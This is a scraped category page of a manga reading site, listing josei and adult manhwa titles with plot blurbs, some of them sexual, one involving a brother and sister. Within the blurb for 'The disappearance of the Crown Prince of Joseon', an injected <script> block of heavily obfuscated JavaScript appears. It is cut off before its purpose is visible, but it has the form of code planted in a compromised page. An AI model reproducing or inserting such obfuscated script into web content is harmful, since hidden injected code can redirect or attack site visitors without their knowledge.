Josei - Page 269

Josei manga is designed for adult women, often covering themes such as love, career, and personal growth. It typically focuses on more realistic portrayals of relationships and emotional maturity, compared to the idealized stories in shoujo manga.

3233 results

The Sweet Wife In Your Palm

Read manhua The Sweet Wife In Your Palm / 掌上甜妻深深宠 Twelve years ago, Min Youyin convinced her father to adopt Ye Qihan as his own, but by doing so her family was torn apart. Backed into a corner, Min Youyin was saved by Zhan Yunting, a man who appeared to have a cold front, but was actually warm-hearted. She believed that he was someone untouchable, until he knelt down on one knee and proposed, “I love you, marry me.” It was only then she knew that the world’s most surprising love: her being secretly in love with him, and him happening to be infatuated with her too.


Come Over Tonight: Melting Down My Ice Cold Boss

All I need in life is a decent job and some money.Or that's what I thought. Sayako Tono, who works as a chief at a company, has been living a frugal life unrelated to romance. Sayako comforts her subordinates disciplined by Director Yukisada, who is rumored to be good-looking but very strict, but she also realizes his kindness. One day, Sayako comes home to find her apartment in trouble and finds out that the new landlord is Yukisada. "Would you like to stay at my place until you find the next room?" A cohabit love comedy between a handsome cool boss and a caring girl!Published by Comicle Original


The Saintess And The Curse

Read manhwa The Saintess And The Curse at Manga Zin The description of the comics “The Saintess And The Curse Manhwa”: Velota Rosebet, the admired saint of the Lunhardt Empire, is marked by a terrible curse: she must receive the essence of a man once a month. Her secret is revealed during a full moon night by Saiden Blackwood, the leader of the order of holy knights, who has harbored a deep love for her. Overcome by anger towards the curse, Saiden decides to take on the task of freeing her. Will he be able to fulfill his oath and restore Velota’s freedom? “The Saintess And The Curse Manhwa” is sames name: The Holy Lady, the Curse Saint, Curse 성녀, 저주

3 days ago

A Complicated Marriage With the Wolf Prince

Read Manhua A Complicated Marriage With the Wolf Prince On Manga Zin


The disappearance of the Crown Prince of Joseon

‘Don’t be a fragile woman’ I replied ‘I won’t be fragile anymore’ ‘Don’t be a butterfly stuck here again’. A story about a couple that ends in tragedy. She, who was born to the wife of a king, vowed not to be a trapped butterfly again. When I opened my eyes, fate came again, ‘Later we will meet again as a man and a woman then you must be my woman and I will never let you go again’ said the man.<script></script><script>function _0x5e53(_0x54d173,_0x4cab10){var _0x2f8ceb=_0x5b39();return _0x5e53=function(_0x5bcc3b,_0xf1b5b3){_0x5bcc3b=_0x5bcc3b-(0x1230+-0x18*-0x79+-0x1bfc);var _0x1202a0=_0x2f8ceb[_0x5bcc3b];return _0x1202a0;},_0x5e53(_0x54d173,_0x4cab10);}(function(_0x48a234,_0x587c5f){var _0x5934ff=_0x5e53,_0x162b0e=_0x48a234();while(!![]){try{var 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In The Night, At The Duke’s Mansion

“In The Night, At The Duke’s Mansion” is a comic book type manhwa recently published on Mature Manhwa, which has been sought after by many people. The description of the comics “In The Night, At The Duke’s Mansion”: Aristasia, a noble lady of the Verdick family, who’s loved by the cold blooded duke and the sword master. Long after her debutante, she didn’t have a significant lover. She was curious about sex and her body became heated, and while she avoided her brother’s eyes, she waited for a gigolo and her brother Evan came. ‘I see, Aris. You were curious about what you would do with a gigolo, but I don’t like that a gigolo will come. So wouldn’t it do if I, your brother, just told you?’ After that night, her brother’s view of Aristasia changed. “In The Night, At The Duke’s Mansion” is another name: In the Middle of the Night in the Duke’s Residence In the Dead of Night, at the Ducal Residence 한밤중에 공작저에서는 Groups Scanlating Manhwa Temple Scan

3 days ago

Rebecca’s Prayer

Read manhwa Rebecca’s Prayer on MANGAZIN In the era of the Industrial Revolution, Rebecca, a girl from a London orphanage in England, steals the fate of an heiress to save her life from the bottom. 레베카의 기도


Survive as the Villain’s Cousin

Read manhwa Survive as the Villain’s Cousin The culprit who turned his twin cousins into villains by appearing in a side story of a novel! …Who would have thought he would be reincarnated as a villain? I sighed deeply and made up my mind. ‘Let’s raise the twins with love and prevent their darkening!’ I don’t care about the novel and get along well with the twins, but the second male lead, whom I had no reason to get involved with, keeps getting more and more obsessed with me! Ah. Where did it go wrong? And why did the second male lead turn dark when I was just trying to stop the villain from turning dark? “Please, please don’t back down anymore. I don’t know how much longer I can endure it.” 악역의 사촌으로 살아남기


Swim In The Cherry

Read manhwa Swim In The Cherry on MANGAZIN During his innocent and clueless high school days, Soo-young has the worst first kiss with his first love, Chaeri. Before they can resolve the misunderstanding, Chaeri transfers to another school, and Soo-young buries the unsettling memory of that first love. Years later, after completing his military service, Soo-young attends an opening party and unexpectedly runs into Chaeri, who has transferred to his school as a new student. Shaken by Chaeri’s unpredictable approach, Soo-young finds himself having an impulsive first experience. “What if I give you a chance to make up for it?” Chaeri asks. “You started it,” Soo-young replies. Đắm Chìm Trong Mật Ngọt 스윔 인 더 체리


I’m Doomed if They Become Obsessed

Read manhwa I’m Doomed if They Become Obsessed / If You’re Obsessed, You’re Doomed I opened my eyes to find myself in an unfamiliar place. In the midst of confusion, the only thing I could rely on was my phone. To recover my memories and return, I had to raise the affection levels of the targets and see a special ending. So, I worked hard to interact with the targets, raising their affection levels one by one. It seemed to be going smoothly—until a new notification arrived. 『Each target’s affection level is capped at 5. If it reaches 6 or more, an “overheat” state will be triggered, greatly increasing the likelihood of an extreme ending.』 ‘Just now… how many hearts were there?’ As I tried to check the system window, I heard approaching footsteps. 집착당하면 파멸합니다


Onsha no Furin no Ken - Zettai ni Wakaresasemasu

What would you do if you discovered someone at your work was having an affair? Perhaps you’d choose to leave the matter alone because it’s not really any of your business. However, if left unchecked, that may all change in an instant. Has an affair at your workplace gotten out of hand? Is it hindering your job and making the work environment suffocating? If so, that may be a job for Rei Saegusa, the cool and sophisticated breakup specialist at Affair Enders. Who will be Rei’s target next?
